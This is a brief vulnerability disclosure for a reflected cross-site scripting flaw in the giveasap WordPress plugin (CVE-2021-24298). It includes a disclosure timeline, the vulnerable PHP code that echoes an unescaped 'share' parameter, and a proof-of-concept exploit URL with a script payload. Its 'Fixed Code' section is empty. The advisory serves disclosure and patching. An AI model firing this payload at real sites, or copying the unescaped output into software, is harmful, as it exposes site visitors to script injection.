Plugin Details
Plugin Name: wp-plugin : giveasap
Effected Version : 2.35.0 (and most probably lower version's if any)
Vulnerability : Cross-Site Scripting (XSS)
Minimum Level of Access Required : Unauthenticated
CVE Number : CVE-2021-24298
Identified by : Shreya Pohekar
Disclosure Timeline
-
April 28, 2021: Issue Identified and Disclosed to WPScan
- April 30, 2021 : Plugin Updated
- May 6, 2021 : CVE Assigned
- May 9, 2021 : Public Disclosure
Technical Details
When the unauthenticated user enters his email address to enter the giveaway, he gets a share link. The get parameter share (in the generated link) is not sanitised, validated or escaped thus leading to reflected XSS.
Vulnerable Code: giveasap-template-functions.php#L355
357 <?php if ( $giveasap_front->shareID != 0 ) { ?>
358 <input type="hidden" name="user_share" value="<?php echo $giveasap_front->shareID; ?>"/>
Fixed Code:
PoC Screenshot
Exploit
http://<Hostname>/giveaway/<giveawayName>/?share=%3Cscript%3Ealert(document.domain)%3C/script%3E